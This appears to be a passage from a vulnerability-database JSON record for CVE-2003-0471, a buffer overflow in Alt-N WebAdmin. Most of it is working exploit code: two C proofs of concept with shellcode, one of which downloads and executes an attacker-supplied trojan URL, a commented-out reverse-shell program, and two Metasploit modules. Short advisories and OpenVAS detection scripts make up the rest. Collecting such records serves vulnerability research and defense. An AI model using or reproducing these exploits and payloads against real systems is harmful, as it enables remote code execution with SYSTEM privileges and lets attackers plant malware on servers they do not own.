\"\\xc6\\x45\\xfa\\x64\"\t\t\t// mov byte ptr ss:[ebp-6],64\r\n\t\t\t\t\t \"\\xc6\\x45\\xfb\\x2e\"\t\t\t// mov byte ptr ss:[ebp-5],2e\r\n\t\t\t\t\t \"\\xc6\\x45\\xfc\\x65\"\t\t\t// mov byte ptr ss:[ebp-4],65\r\n\t\t\t\t\t \"\\xc6\\x45\\xfd\\x78\"\t\t\t// mov byte ptr ss:[ebp-3],78\r\n\t\t\t\t\t \"\\xc6\\x45\\xfe\\x65\"\t\t\t// mov byte ptr ss:[ebp-2],65\r\n\t\t\t\t\t \"\\xb8\\x4a\\x9B\\x01\\x78\"\t\t\t// mov eax, 78019b4a;system() from msvcrt win2ksp2\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t \"\\x8d\\x45\\xf8\"\t\t\t\t// lea eax, dword ptr ss:[ebp-8]\r\n\t\t\t\t\t \"\\x50\"\t\t\t\t\t// push eax\r\n\t\t\t\t\t \"\\xff\\x55\\xf4\"\t\t\t\t// call dword ptr ss:[ebp-c]\r\n\t\t\t\t\t \"\\x83\\xc4\\x04\"\t\t\t\t// add esp, 04h\r\n\t\t\t\t\t \"\\x5c\"\t\t\t\t\t// pop esp\r\n\t\t\t\t\t \"\\xc3\";\t\t\t\t// ret\t\t\twe're done!\r\n\r\n\r\n\r\nstruct sockaddr_in victim;\r\nint main(int argc, char **argv) {\r\n\tSOCKET s;\r\n\tWSADATA wsadata;\r\n\tint x;\r\n\tDWORD jmpesp = 0x1005d58d; // jmp esp from 2.0.4 webAdmin.dll...\r\n\tchar exp_buf[5000];\r\n\tchar boom[] = \r\n\t\t\"POST /WebAdmin.dll?View=Logon HTTP/1.1\\r\\n\"\r\n\t\t\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\"\r\n\t\t\"Accept-Language: en-us\\r\\n\"\r\n\t\t\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n\t\t\"Accept-Encoding: gzip, deflate\\r\\n\"\r\n\t\t\"User-Agent: Your Mom\\r\\n\"\r\n\t\t\"Host: sh0dan.org\\r\\n\"\r\n\t\t\"Content-Length: 395\\r\\n\"\r\n\t\t\"Connection: Keep-Alive\\r\\n\"\r\n\t\t\"Cache-Control: no-cache\\r\\n\"\r\n\t\t\"Cookie: User=test; Lang=en; Theme=Standard\\r\\n\\r\\nUser=\";\r\n\tchar o_args[] = \r\n\t\t\"&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In\\r\\n\\r\\n\";\r\n\t\r\n if (argc != 3) {\r\n\t\tfprintf(stderr, \"WebAdmin from Alt-N 2.0.4 Remote Exploit Proof Of Concept\\n\");\r\n\t\tfprintf(stderr, \"Werd to Mark Litchfield for finding this easily exploited hole\\n\");\r\n\t\tfprintf(stderr, \"Usage: %s <victim> <port>\\n\", argv[0]);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tWSAStartup(MAKEWORD(2,0),&wsadata);\r\n\tvictim.sin_port = htons(atoi(argv[2]));\r\n\tvictim.sin_addr.s_addr = inet_addr(argv[1]);\r\n\tvictim.sin_family = AF_INET;\r\n\r\n\tmemset(exp_buf, 0x90, 5000);\r\n\tx = strlen(boom);\r\n\tstrncpy(exp_buf, boom, x);\r\n\tx += 168;\r\n\r\n\tmemcpy(exp_buf+x, &jmpesp, 4);\r\n\tx += 4;\r\n\tmemcpy(exp_buf+x, sc, strlen(sc));\r\n\tx += strlen(sc);\r\n\tmemcpy(exp_buf+x, o_args, strlen(o_args));\r\n\tx += strlen(o_args);\r\n\texp_buf[x+1] = 0x00;\r\n\r\n\ts = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);\r\n\tconnect(s, (struct sockaddr *)&victim, sizeof(victim));\r\n\tsend(s, exp_buf, x, 0);\r\n \r\n\tprintf(\"booyah\");\r\n\treturn(0);\r\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22833/"}, {"lastseen": "2016-02-02T19:39:01", "description": "Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability (2). CVE-2003-0471. Remote exploit for windows platform", "published": "2003-06-24T00:00:00", "type": "exploitdb", "title": "Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2003-06-24T00:00:00", "id": "EDB-ID:22834", "href": "https://www.exploit-db.com/exploits/22834/", "sourceData": "source: http://www.securityfocus.com/bid/8024/info\r\n \r\nAlt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.\r\n\r\n/* WebAdmin.dll remote download exec shellcode. Works on 2.0.3 and 2.0.4 all windows sp's.\r\nOh and my previous exploit, i'm an idiot and 2.0.5 *is* the patch, heh. \r\nThis shellcode was used by ThreaT in his vulnreg.reg exploit, it works quite nicely.\r\nLook at the bottom of the code for some trojan.exe idea's. That one i found somewhere but\r\ni can't remember.\r\nshellcode has one minor suck point, it shows a window on the target host, oh and the exploit\r\ncrashes the server, so make a user account and restart the service. Be Kind.\r\nword to Mark Litchfield for finding this, i suggest anyone who is interested in learning win32\r\nexploitation download this and attempt to exploit it, it's easier than you think.\r\ndon't download directly from alt-n, they patched all of their 'archived' versions. heh.\r\nshouts to innercircle you little kittens you....\r\n-wire \r\n*/\r\n\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n#define snprintf _snprintf // <-- a big fuck you to ms.\r\n\r\n#pragma comment(lib,\"ws2_32\") \r\n\r\nchar sc[700] = \r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x68\\x5E\\x56\\xC3\\x90\\x8B\\xCC\\xFF\\xD1\\x83\\xC6\\x0E\\x90\\x8B\\xFE\\xAC\" \r\n \"\\x34\\x99\\xAA\\x84\\xC0\\x75\\xF8\"// download and exec ala ThreaT vulnreg exploit.\r\n \"\\x72\\xeb\\xf3\\xa9\\xc2\\xfd\\x12\\x9a\\x12\\xd9\\x95\\x12\\xd1\\x95\\x12\\x58\\x12\\xc5\\xbd\\x91\"\r\n \"\\x12\\xe9\\xa9\\x9a\\xed\\xbd\\x9d\\xa1\\x87\\xec\\xd5\\x12\\xd9\\x81\\x12\\xc1\\xa5\\x9a\\x41\\x12\"\r\n \"\\xc2\\xe1\\x9a\\x41\\x12\\xea\\x85\\x9a\\x69\\xcf\\x12\\xea\\xbd\\x9a\\x69\\xcf\\x12\\xca\\xb9\\x9a\"\r\n \"\\x49\\x12\\xc2\\x81\\xd2\\x12\\xad\\x03\\x9a\\x69\\x9a\\xed\\xbd\\x8d\\x12\\xaf\\xa2\\xed\\xbd\\x81\"\r\n \"\\xed\\x93\\xd2\\xba\\x42\\xec\\x73\\xc1\\xc1\\xaa\\x59\\x5a\\xc6\\xaa\\x50\\xff\\x12\\x95\\xc6\\xc6\"\r\n \"\\x12\\xa5\\x16\\x14\\x9d\\x9e\\x5a\\x12\\x81\\x12\\x5a\\xa2\\x58\\xec\\x04\\x5a\\x72\\xe5\\xaa\\x42\"\r\n \"\\xf1\\xe0\\xdc\\xe1\\xd8\\xf3\\x93\\xf3\\xd2\\xca\\x71\\xe2\\x66\\x66\\x66\\xaa\\x50\\xc8\\xf1\\xec\"\r\n \"\\xeb\\xf5\\xf4\\xff\\x5e\\xdd\\xbd\\x9d\\xf6\\xf7\\x12\\x75\\xc8\\xc8\\xcc\\x66\\x49\\xf1\\xf0\\xf5\"\r\n \"\\xfc\\xd8\\xf3\\x97\\xf3\\xeb\\xf3\\x9b\\x71\\xcc\\x66\\x66\\x66\\xaa\\x42\\xca\\xf1\\xf8\\xb7\\xfc\"\r\n \"\\xe1\\x5f\\xdd\\xbd\\x9d\\xfc\\x12\\x55\\xca\\xca\\xc8\\x66\\xec\\x81\\xca\\x66\\x49\\xaa\\x42\\xf1\"\r\n \"\\xf0\\xf7\\xdc\\xe1\\xf3\\x98\\xf3\\xd2\\xca\\x71\\xb5\\x66\\x66\\x66\\x14\\xd5\\xbd\\x89\\xf3\\x98\"\r\n \"\\xc8\\x66\\x49\\xaa\\x42\\xf1\\xe1\\xf0\\xed\\xc9\\xf3\\x98\\xf3\\xd2\\xca\\x71\\x8b\\x66\\x66\\x66\"\r\n \"\\x66\\x49\\x71\\xe6\\x66\\x66\\x66\";\r\n\r\n\r\nstruct sockaddr_in victim;\r\nint main(int argc, char **argv) {\r\n SOCKET s;\r\n WSADATA wsadata;\r\n int x;\r\n unsigned int i;\r\n DWORD jmpesp4 = 0x1005d58d; // jmp esp from 2.0.4 webAdmin.dll...\r\n DWORD jmpesp3 = 0x10071c43; // jmp esp from 2.0.3 webAdmin.dll...\r\n\r\n char exp_buf[5000];\r\n char post[] = \r\n \"POST /WebAdmin.dll?View=Logon HTTP/1.1\\r\\n\"\r\n \"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\"\r\n \"Accept-Language: en-us\\r\\n\"\r\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n \"Accept-Encoding: gzip, deflate\\r\\n\"\r\n \"User-Agent: Your Mom\\r\\n\"\r\n \"Host: sh0dan.org\\r\\n\";\r\n \r\n char rest[] = \r\n \"Connection: Keep-Alive\\r\\n\"\r\n \"Cache-Control: no-cache\\r\\n\"\r\n \"Cookie: User=test; Lang=en; Theme=Standard\\r\\n\\r\\nUser=\";\r\n\r\n char o_args[] = \r\n \"&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In\\r\\n\\r\\n\";\r\n \r\n if (argc != 5) {\r\n fprintf(stderr, \"WebAdmin from Alt-N remote LocalSystem exploit.\\n\");\r\n fprintf(stderr, \"Werd to Mark Litchfield for finding this easily exploited hole\\n\");\r\n fprintf(stderr, \"supports version 2.0.3 and 2.0.4 on any sp.\\n\");\r\n fprintf(stderr, \"Usage: %s <victim> <port> <url> <version> where version is 3 or 4\\n\", argv[0]);\r\n fprintf(stderr, \"Ex: %s 192.168.0.1 1000 http://heh.com/trojan.exe 4\\n\", argv[0]); \r\n exit(1);\r\n }\r\n\r\n\r\n WSAStartup(MAKEWORD(2,0),&wsadata);\r\n victim.sin_port = htons(atoi(argv[2]));\r\n victim.sin_addr.s_addr = inet_addr(argv[1]);\r\n victim.sin_family = AF_INET;\r\n\r\n\r\n memset(exp_buf, 0x00, 5000);\r\n \r\n for (i = 0; i < strlen(argv[3]); argv[3][i++] ^=0x99); // xor our url.\r\n\r\n strncat(sc, argv[3], 100); // strcat the xor'd address onto sc.\r\n strncat(sc, \"\\x99\", 1); // xor'd 00\r\n snprintf(exp_buf, 2000, \"%sContent-Length: %d\\r\\n%s\", post, (strlen(sc)+strlen(rest)+168), rest);\r\n\r\n x = strlen(exp_buf);\r\n memset(exp_buf+x, 0x90, 168);\r\n x += 168;\r\n\r\n if(atoi(argv[4]) == 4) {\r\n memcpy(exp_buf+x, &jmpesp4, 4);\r\n x += 4;\r\n } else if (atoi(argv[4]) == 3) {\r\n memcpy(exp_buf+x, &jmpesp3, 4);\r\n x += 4;\r\n } else {\r\n fprintf(stderr, \"uhm unknown version, try 3 or 4\\n\");\r\n exit(1);\r\n }\r\n\r\n memcpy(exp_buf+x, sc, strlen(sc));\r\n x += strlen(sc);\r\n \r\n memcpy(exp_buf+x, o_args, strlen(o_args));\r\n x += strlen(o_args);\r\n exp_buf[x+1] = 0x00;\r\n\r\n s = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);\r\n if(connect(s, (struct sockaddr *)&victim, sizeof(victim)) < 0) {\r\n fprintf(stderr,\"error couldn't connect\\n\");\r\n\texit(1);\r\n }\r\n send(s, exp_buf, x, 0);\r\n printf(\"sent!\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n/*\r\nripped from somewhere, sorry i forget where i got this.\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n#pragma comment(lib,\"ws2_32\")\r\n\r\n#define PORT 53\r\n#define IP 192.168.0.21\r\nvoid main(int argc, char *argv[])\r\n{\r\n WSADATA wsaData; \r\n SOCKET hSocket;\r\n STARTUPINFO si;\r\n PROCESS_INFORMATION pi;\r\n struct sockaddr_in adik_sin; \r\n memset(&adik_sin,0,sizeof(adik_sin));\r\n memset(&si,0,sizeof(si));\r\n WSAStartup(MAKEWORD(2,0),&wsaData);\r\n hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);\r\n adik_sin.sin_family = AF_INET;\r\n adik_sin.sin_port = htons(PORT);\r\n adik_sin.sin_addr.s_addr = inet_addr(\"IP\");\r\n connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));\r\n si.cb = sizeof(si);\r\n si.dwFlags = STARTF_USESTDHANDLES;\r\n si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;\r\n CreateProcess(NULL,\"cmd\",NULL,NULL,true,NULL,NULL,NULL,&si,&pi); \r\n ExitProcess(0);\r\n\r\n}\r\n*/\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22834/"}], "packetstorm": [{"lastseen": "2016-12-05T22:13:33", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Alt-N WebAdmin USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83099", "href": "https://packetstormsecurity.com/files/83099/Alt-N-WebAdmin-USER-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Alt-N WebAdmin USER Buffer Overflow', \n'Description' => %q{ \nAlt-N WebAdmin is prone to a buffer overflow condition. This \nis due to insufficient bounds checking on the USER \nparameter. Successful exploitation could result in code \nexecution with SYSTEM level privileges. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2003-0471' ], \n[ 'OSVDB', '2207' ], \n[ 'BID', '8024'], \n[ 'NSS', '11771'], \n \n], \n'Privileged' => false, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 830, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll \n['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll \n['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll \n['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll \n], \n'DisclosureDate' => 'Jun 24 2003')) \n \nregister_options([Opt::RPORT(1000)], self.class) \nend \n \n# Identify the target based on the WebAdmin version number \ndef autofilter \nres = send_request_raw({ \n'uri' => '/WebAdmin.DLL' \n}, -1) \n \nif (res and res.body =~ /WebAdmin.*v(2\\..*)$/) \ncase $1 \nwhen /2\\.0\\.4/ \ndatastore['TARGET'] = 0 \nwhen /2\\.0\\.3/ \ndatastore['TARGET'] = 1 \nwhen /2\\.0\\.2/ \ndatastore['TARGET'] = 2 \nwhen /2\\.0\\.1/ \ndatastore['TARGET'] = 3 \nelse \nreturn false \nend \n \nreturn true \nend \n \n# Not vulnerable \nreturn false \nend \n \ndef exploit \n \nuser_cook = rand_text_alphanumeric(2) \npost_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded \npost_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In' \n \nprint_status(\"Sending request...\") \nres = send_request_cgi({ \n'uri' => '/WebAdmin.DLL', \n'query' => 'View=Logon', \n'method' => 'POST', \n'content-type' => 'application/x-www-form-urlencoded', \n'cookie' => \"User=#{user_cook}; Lang=en; Theme=standard\", \n'data' => post_data, \n'headers' => \n{ \n'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png', \n'Accept-Language' => 'en', \n'Accept-Charset' => 'iso-8859-1,*,utf-8' \n} \n}, 5) \n \nhandler \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83099/altn_webadmin.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0471"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in WebAdmin. The issue is due to insufficient bounds checking on the USER parameter resulting in a buffer overflow. With a specially crafted request, an attacker can cause code execution with SYSTEM level privileges resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in WebAdmin. The issue is due to insufficient bounds checking on the USER parameter resulting in a buffer overflow. With a specially crafted request, an attacker can cause code execution with SYSTEM level privileges resulting in a loss of integrity.\n## References:\n[Nessus Plugin ID:11771](https://vulners.com/search?query=pluginID:11771)\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=105648385900792&w=2\nGeneric Informational URL: http://milw0rm.com/metasploit.php?id=95\nGeneric Exploit URL: http://metasploit.com/projects/Framework/modules/exploits/altn_webadmin.pm\n[CVE-2003-0471](https://vulners.com/cve/CVE-2003-0471)\nBugtraq ID: 8024\n", "modified": "2003-06-24T14:07:18", "published": "2003-06-24T14:07:18", "href": "https://vulners.com/osvdb/OSVDB:2207", "id": "OSVDB:2207", "type": "osvdb", "title": "Alt-N WebAdmin USER Buffer Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0471"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=105647081418155&w=2\n[CVE-2003-0471](https://vulners.com/cve/CVE-2003-0471)\n", "modified": "2003-06-24T17:22:21", "published": "2003-06-24T17:22:21", "href": "https://vulners.com/osvdb/OSVDB:2653", "id": "OSVDB:2653", "type": "osvdb", "title": "WebAdmin WebAdmin.dll Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-05-08T08:39:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0471"], "description": "webadmin.dll was found on your web server.\n Old versions of this CGI suffered from numerous problems:\n\n - installation path disclosure\n\n - directory traversal, allowing anybody with\n administrative permission on WebAdmin to read any file\n\n - buffer overflow, allowing anybody to run arbitrary code on\n your server with SYSTEM privileges.", "modified": "2020-05-05T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231011771", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011771", "type": "openvas", "title": "webadmin.dll detection", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# webadmin.dll detection\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11771\");\n script_version(\"2020-05-05T09:44:01+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(7438, 7439, 8024);\n script_cve_id(\"CVE-2003-0471\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"webadmin.dll detection\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2003 Michel Arboi\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest version if necessary.\");\n\n script_tag(name:\"summary\", value:\"webadmin.dll was found on your web server.\n Old versions of this CGI suffered from numerous problems:\n\n - installation path disclosure\n\n - directory traversal, allowing anybody with\n administrative permission on WebAdmin to read any file\n\n - buffer overflow, allowing anybody to run arbitrary code on\n your server with SYSTEM privileges.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nres = http_is_cgi_installed_ka( port:port, item:\"webadmin.dll\" );\nif( res ) {\n security_message( port:port );\n}\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-09-19T11:57:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0471"], "description": "webadmin.dll was found on your web server. \nOld versions of this CGI suffered from numerous problems:\n - installation path disclosure\n - directory traversal, allowing anybody with \n administrative permission on WebAdmin to read any file\n - buffer overflow, allowing anybody to run arbitrary code on\n your server with SYSTEM privileges.\n\n*** Note that no attack was performed, and the version number was\n*** not checked, so this might be a false alert", "modified": "2017-09-18T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:11771", "href": "http://plugins.openvas.org/nasl.php?oid=11771", "type": "openvas", "title": "webadmin.dll detection", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: webadmin.nasl 7175 2017-09-18 11:55:15Z cfischer $\n# Description: webadmin.dll detection\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"webadmin.dll was found on your web server. \nOld versions of this CGI suffered from numerous problems:\n - installation path disclosure\n - directory traversal, allowing anybody with \n administrative permission on WebAdmin to read any file\n - buffer overflow, allowing anybody to run arbitrary code on\n your server with SYSTEM privileges.\n\n*** Note that no attack was performed, and the version number was\n*** not checked, so this might be a false alert\";\n\ntag_solution = \"Upgrade to the latest version if necessary\";\n\n# References:\n# http://www.kamborio.com/?Section=Articles&Mode=select&ID=55\n#\n# From: \"Mark Litchfield\" <mark@ngssoftware.com>\n# To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org, \n# vulndb@securityfocus.com\n# Date: Tue, 24 Jun 2003 15:22:21 -0700\n# Subject: Remote Buffer Overrun WebAdmin.exe\n\nif(description)\n{\n script_id(11771);\n script_version(\"$Revision: 7175 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-18 13:55:15 +0200 (Mon, 18 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(7438, 7439, 8024);\n script_cve_id(\"CVE-2003-0471\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name( \"webadmin.dll detection\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2003 Michel Arboi\");\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nres = is_cgi_installed_ka(port:port, item:\"webadmin.dll\");\nif (res) security_message(port);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2020-07-02T22:48:25", "description": "Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.\n", "published": "2006-01-16T03:48:36", "type": "metasploit", "title": "Alt-N WebAdmin USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0471"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/ALTN_WEBADMIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Alt-N WebAdmin USER Buffer Overflow',\n 'Description' => %q{\n Alt-N WebAdmin is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the USER\n parameter. Successful exploitation could result in code\n execution with SYSTEM level privileges.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2003-0471' ],\n [ 'OSVDB', '2207' ],\n [ 'BID', '8024'],\n [ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=11771']\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 830,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\n 'StackAdjustment' => -3500,\n\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Automatic', {}],\n ['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll\n ['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll\n ['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll\n ['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 24 2003'))\n\n register_options([Opt::RPORT(1000)])\n end\n\n def exploit\n\n mytarget = target\n\n if (target.name =~ /Automatic/)\n res = send_request_raw({\n 'uri' => '/WebAdmin.DLL'\n }, -1)\n\n if (res and res.body =~ /WebAdmin.*v(2\\..*)$/)\n case $1\n when /2\\.0\\.4/\n mytarget = targets[1]\n when /2\\.0\\.3/\n mytarget = targets[2]\n when /2\\.0\\.2/\n mytarget = targets[3]\n when /2\\.0\\.1/\n mytarget = targets[4]\n else\n print_error(\"No target found for v#{$1}\")\n return\n end\n else\n print_error(\"No target found\")\n end\n end\n\n user_cook = rand_text_alphanumeric(2)\n post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded\n post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'\n\n print_status(\"Sending request...\")\n res = send_request_cgi({\n 'uri' => '/WebAdmin.DLL',\n 'query' => 'View=Logon',\n 'method' => 'POST',\n 'content-type' => 'application/x-www-form-urlencoded',\n 'cookie' => \"User=#{user_cook}; Lang=en; Theme=standard\",\n 'data' => post_data,\n 'headers' =>\n {\n 'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 